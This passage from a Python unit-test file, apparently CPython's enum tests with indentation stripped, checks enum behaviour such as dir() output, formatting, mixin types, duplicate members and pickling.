for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# for global repr tests
@enum.global_enum
class HeadlightsK(IntFlag, boundary=enum.KEEP):
OFF_K = 0
LOW_BEAM_K = auto()
HIGH_BEAM_K = auto()
FOG_K = auto()
@enum.global_enum
class HeadlightsC(IntFlag, boundary=enum.CONFORM):
OFF_C = 0
LOW_BEAM_C = auto()
HIGH_BEAM_C = auto()
FOG_C = auto()
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
class DateEnum(date, Enum): pass
self.DateEnum = DateEnum
class FloatEnum(float, Enum): pass
self.FloatEnum = FloatEnum
class Wowser(Enum):
this = 'that'
these = 'those'
def wowser(self):
"""Wowser docstring"""
return ("Wowser! I'm %s!" % self.name)
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.Wowser = Wowser
class IntWowser(IntEnum):
this = 1
these = 2
def wowser(self):
"""Wowser docstring"""
return ("Wowser! I'm %s!" % self.name)
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.IntWowser = IntWowser
class FloatWowser(float, Enum):
this = 3.14
these = 4.2
def wowser(self):
"""Wowser docstring"""
return ("Wowser! I'm %s!" % self.name)
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.FloatWowser = FloatWowser
class WowserNoMembers(Enum):
def wowser(self): pass
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
class SubclassOfWowserNoMembers(WowserNoMembers): pass
self.WowserNoMembers = WowserNoMembers
self.SubclassOfWowserNoMembers = SubclassOfWowserNoMembers
class IntWowserNoMembers(IntEnum):
def wowser(self): pass
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.IntWowserNoMembers = IntWowserNoMembers
class FloatWowserNoMembers(float, Enum):
def wowser(self): pass
@classmethod
def classmethod_wowser(cls): pass
@staticmethod
def staticmethod_wowser(): pass
self.FloatWowserNoMembers = FloatWowserNoMembers
class EnumWithInit(Enum):
def __init__(self, greeting, farewell):
self.greeting = greeting
self.farewell = farewell
ENGLISH = 'hello', 'goodbye'
GERMAN = 'Guten Morgen', 'Auf Wiedersehen'
def some_method(self): pass
self.EnumWithInit = EnumWithInit
# see issue22506
class SuperEnum1(Enum):
def invisible(self):
return "did you see me?"
class SubEnum1(SuperEnum1):
sample = 5
self.SubEnum1 = SubEnum1
class SuperEnum2(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum2(SuperEnum2):
sample = 5
self.SubEnum2 = SubEnum2
def test_dir_basics_for_all_enums(self):
enums_for_tests = (
# Generic enums in enum.py
Enum,
IntEnum,
StrEnum,
# Generic enums defined outside of enum.py
self.DateEnum,
self.FloatEnum,
# Concrete enums derived from enum.py generics
self.Grades,
self.Season,
# Concrete enums derived from generics defined outside of enum.py
self.Konstants,
self.Holiday,
# Standard enum with added behaviour & members
self.Wowser,
# Mixin-enum-from-enum.py with added behaviour & members
self.IntWowser,
# Mixin-enum-from-oustide-enum.py with added behaviour & members
self.FloatWowser,
# Equivalents of the three immediately above, but with no members
self.WowserNoMembers,
self.IntWowserNoMembers,
self.FloatWowserNoMembers,
# Enum with members and an __init__ method
self.EnumWithInit,
# Special cases to test
self.SubEnum1,
self.SubEnum2
)
for cls in enums_for_tests:
with self.subTest(cls=cls):
cls_dir = dir(cls)
# test that dir is deterministic
self.assertEqual(cls_dir, dir(cls))
# test that dir is sorted
self.assertEqual(list(cls_dir), sorted(cls_dir))
# test that there are no dupes in dir
self.assertEqual(len(cls_dir), len(set(cls_dir)))
# test that there are no sunders in dir
self.assertFalse(any(enum._is_sunder(attr) for attr in cls_dir))
self.assertNotIn('__new__', cls_dir)
for attr in ('__class__', '__doc__', '__members__', '__module__'):
with self.subTest(attr=attr):
self.assertIn(attr, cls_dir)
def test_dir_for_enum_with_members(self):
enums_for_test = (
# Enum with members
self.Season,
# IntEnum with members
self.Grades,
# Two custom-mixin enums with members
self.Konstants,
self.Holiday,
# several enums-with-added-behaviour and members
self.Wowser,
self.IntWowser,
self.FloatWowser,
# An enum with an __init__ method and members
self.EnumWithInit,
# Special cases to test
self.SubEnum1,
self.SubEnum2
)
for cls in enums_for_test:
cls_dir = dir(cls)
member_names = cls._member_names_
with self.subTest(cls=cls):
self.assertTrue(all(member_name in cls_dir for member_name in member_names))
for member in cls:
member_dir = dir(member)
# test that dir is deterministic
self.assertEqual(member_dir, dir(member))
# test that dir is sorted
self.assertEqual(list(member_dir), sorted(member_dir))
# test that there are no dupes in dir
self.assertEqual(len(member_dir), len(set(member_dir)))
for attr_name in cls_dir:
with self.subTest(attr_name=attr_name):
if attr_name in {'__members__', '__init__', '__new__', *member_names}:
self.assertNotIn(attr_name, member_dir)
else:
self.assertIn(attr_name, member_dir)
self.assertFalse(any(enum._is_sunder(attr) for attr in member_dir))
def test_dir_for_enums_with_added_behaviour(self):
enums_for_test = (
self.Wowser,
self.IntWowser,
self.FloatWowser,
self.WowserNoMembers,
self.SubclassOfWowserNoMembers,
self.IntWowserNoMembers,
self.FloatWowserNoMembers
)
for cls in enums_for_test:
with self.subTest(cls=cls):
self.assertIn('wowser', dir(cls))
self.assertIn('classmethod_wowser', dir(cls))
self.assertIn('staticmethod_wowser', dir(cls))
self.assertTrue(all(
all(attr in dir(member) for attr in ('wowser', 'classmethod_wowser', 'staticmethod_wowser'))
for member in cls
))
self.assertEqual(dir(self.WowserNoMembers), dir(self.SubclassOfWowserNoMembers))
# Check classmethods are present
self.assertIn('from_bytes', dir(self.IntWowser))
self.assertIn('from_bytes', dir(self.IntWowserNoMembers))
def test_help_output_on_enum_members(self):
added_behaviour_enums = (
self.Wowser,
self.IntWowser,
self.FloatWowser
)
for cls in added_behaviour_enums:
with self.subTest(cls=cls):
rendered_doc = pydoc.render_doc(cls.this)
self.assertIn('Wowser docstring', rendered_doc)
if cls in {self.IntWowser, self.FloatWowser}:
self.assertIn('float(self)', rendered_doc)
def test_dir_for_enum_with_init(self):
EnumWithInit = self.EnumWithInit
cls_dir = dir(EnumWithInit)
self.assertIn('__init__', cls_dir)
self.assertIn('some_method', cls_dir)
self.assertNotIn('greeting', cls_dir)
self.assertNotIn('farewell', cls_dir)
member_dir = dir(EnumWithInit.ENGLISH)
self.assertNotIn('__init__', member_dir)
self.assertIn('some_method', member_dir)
self.assertIn('greeting', member_dir)
self.assertIn('farewell', member_dir)
def test_mixin_dirs(self):
from datetime import date
enums_for_test = (
# generic mixins from enum.py
(IntEnum, int),
(StrEnum, str),
# generic mixins from outside enum.py
(self.FloatEnum, float),
(self.DateEnum, date),
# concrete mixin from enum.py
(self.Grades, int),
# concrete mixin from outside enum.py
(self.Holiday, date),
# concrete mixin from enum.py with added behaviour
(self.IntWowser, int),
# concrete mixin from outside enum.py with added behaviour
(self.FloatWowser, float)
)
enum_dict = Enum.__dict__
enum_dir = dir(Enum)
enum_module_names = enum.__all__
is_from_enum_module = lambda cls: cls.__name__ in enum_module_names
is_enum_dunder = lambda attr: enum._is_dunder(attr) and attr in enum_dict
def attr_is_inherited_from_object(cls, attr_name):
for base in cls.__mro__:
if attr_name in base.__dict__:
return base is object
return False
# General tests
for enum_cls, mixin_cls in enums_for_test:
with self.subTest(enum_cls=enum_cls):
cls_dir = dir(enum_cls)
cls_dict = enum_cls.__dict__
mixin_attrs = [
x for x in dir(mixin_cls)
if not attr_is_inherited_from_object(cls=mixin_cls, attr_name=x)
]
first_enum_base = next(
base for base in enum_cls.__mro__
if is_from_enum_module(base)
)
for attr in mixin_attrs:
with self.subTest(attr=attr):
if enum._is_sunder(attr):
# Unlikely, but no harm in testing
self.assertNotIn(attr, cls_dir)
elif attr in {'__class__', '__doc__', '__members__', '__module__'}:
self.assertIn(attr, cls_dir)
elif is_enum_dunder(attr):
if is_from_enum_module(enum_cls):
self.assertNotIn(attr, cls_dir)
elif getattr(enum_cls, attr) is getattr(first_enum_base, attr):
self.assertNotIn(attr, cls_dir)
else:
self.assertIn(attr, cls_dir)
else:
self.assertIn(attr, cls_dir)
# Some specific examples
int_enum_dir = dir(IntEnum)
self.assertIn('imag', int_enum_dir)
self.assertIn('__rfloordiv__', int_enum_dir)
self.assertNotIn('__format__', int_enum_dir)
self.assertNotIn('__hash__', int_enum_dir)
self.assertNotIn('__init_subclass__', int_enum_dir)
self.assertNotIn('__subclasshook__', int_enum_dir)
class OverridesFormatOutsideEnumModule(Enum):
def __format__(self, *args, **kwargs):
return super().__format__(*args, **kwargs)
SOME_MEMBER = 1
self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule))
self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule.SOME_MEMBER))
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
self.assertEqual(
set(dir(self.SubEnum1.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
self.assertTrue({'description'} <= set(dir(self.SubEnum2.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
3 in Season
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
self.assertTrue(3 in Season)
self.assertFalse('AUTUMN' in Season)
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
@unittest.skipIf(
python_version < (3, 12),
'mixin-format is still using member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertEqual(f'{self.Grades.B}', 'B')
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{Grades.B}', '4')
def assertFormatIsValue(self, spec, member):
if python_version < (3, 12) and (not spec or spec in ('{}','{:}')):
with self.assertWarns(DeprecationWarning):
self.assertEqual(spec.format(member), spec.format(member.value))
else:
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
#
class SillyInt(HexInt):
__qualname__ = 'SillyInt'
pass
class MyOtherEnum(SillyInt, enum.Enum):
__qualname__ = 'MyOtherEnum'
D = 4
E = 5
F = 6
self.assertIs(MyOtherEnum._member_type_, SillyInt)
globals()['SillyInt'] = SillyInt
globals()['MyOtherEnum'] = MyOtherEnum
test_pickle_dump_load(self.assertIs, MyOtherEnum.E)
test_pickle_dump_load(self.assertIs, MyOtherEnum)
#
# This did not work in 3.9, but does now with pickling by name
class UnBrokenInt(int):
__qualname__ = 'UnBrokenInt'
def __new__(cls, value):
return int.__new__(cls, value)
class MyUnBrokenEnum(UnBrokenInt, Enum):
__qualname__ = 'MyUnBrokenEnum'
G = 7
H = 8
I = 9
self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt)
self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G)
globals()['UnBrokenInt'] = UnBrokenInt
globals()['MyUnBrokenEnum'] = MyUnBrokenEnum
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I)
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum)
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_value_auto_assign(self):
class Some(Enum):
def __new__(cls, val):
return object.__new__(cls)
x = 1
y = 2
self.assertEqual(Some.x.value, 1)
self.assertEqual(Some.y.value, 2)
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
